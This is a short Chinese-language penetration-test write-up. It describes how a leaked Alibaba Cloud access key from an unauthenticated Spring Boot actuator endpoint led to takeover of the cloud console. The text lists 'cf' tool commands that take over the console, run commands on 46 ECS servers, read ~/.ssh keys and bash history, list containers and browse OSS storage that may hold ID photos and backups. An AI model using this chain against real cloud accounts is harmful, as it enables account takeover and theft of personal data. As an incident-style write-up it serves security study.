【漏洞案例】一次简单的“云“上野战记录

一次简单的”云”上野战记录

0x00 Springboot actuator开局

打点发现某系统存在springboot actuator未授权访问，看到一个神奇的oss接口，springboot未授权玩了这么多年，也是第一次碰到云的响应：

直接访问，AK到手：

 

0x01 一键接管？

配置AK：

cf config

查看当前AK的权限:

cf alibaba perm

 

一键接管控制台：

cf alibaba console

 

 

云上自带的扫描，可以看到有好多漏洞都未修复，相当于一堆靶场啊：

0x02 ECS利用

列出ECS：

 cf alibaba ecs ls

46台服务器到手(有几个stoped)，直接命令三连，截图留证：

cf alibaba ecs exec -b

 

然后就是翻翻实例，看看能不能发现什么有用的信息。

root权限，直接开始捡漏，看到了公私钥，又一波免密登录机器到手：

cf alibaba ecs exec -i 实例ID -c "ls ~/.ssh"

cf alibaba ecs exec -i 实例ID -c "ls ~/.bash_history"

熟悉的味道，碰到了久违的k8s，拿下拿下：

cf alibaba ecs exec -i 实例ID -c "docker ps -a"

 

再看看数据库吧： 

 

 

 

0x03 OSS利用

内容比较多，直接oss浏览器连接查看，太多了，懒得翻了，一般会存一些照片（证件照？），备份库之类的：